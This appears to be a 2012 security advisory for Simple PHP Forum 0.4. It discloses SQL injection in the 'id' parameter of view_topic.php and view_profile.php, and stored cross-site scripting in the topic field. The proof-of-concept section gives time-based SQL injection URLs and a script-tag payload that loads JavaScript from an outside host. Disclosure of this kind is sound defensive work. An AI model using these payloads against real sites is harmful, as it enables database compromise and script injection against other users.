Sphpforum 0.4 Cross Site Scripting / SQL Injection

2012.08.16
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

# Author: loneferret of Offensive Security # Product: sphpforum # Version: 0.4 (older versions may be affected) # # Software Download: http://sourceforge.net/projects/sphpforum/ # Description: # Simple PHP Forum is a PHP based forum/BBS board is designed to be small, simple, # fast and allow easy integration into any existing web site. # Vulnerability: # Due to improper input sanitation, parameters are prone to SQL injection. Stored # crossed site scripting is also present in some forms. # PoC 1: # SQL Injection # Page: view_topic.php / view_profile.php? # Vulnerable param: 'id' # http://172.16.194.148/sphpforum/sphpforum-0.4/view_topic.php?id=50%27%20and%20sleep%2810%29%20and%20%271%27=%271 # http://172.16.194.148/sphpforum/sphpforum-0.4/view_profile.php?id=loneferret%27%20and%20sleep%2810%29%20and%20%271%27=%271 # PoC 2: # Stored XSS # Page: create_topic.php # Vulnerable field: Topic # Payload: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

References:

http://sourceforge.net/projects/sphpforum/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top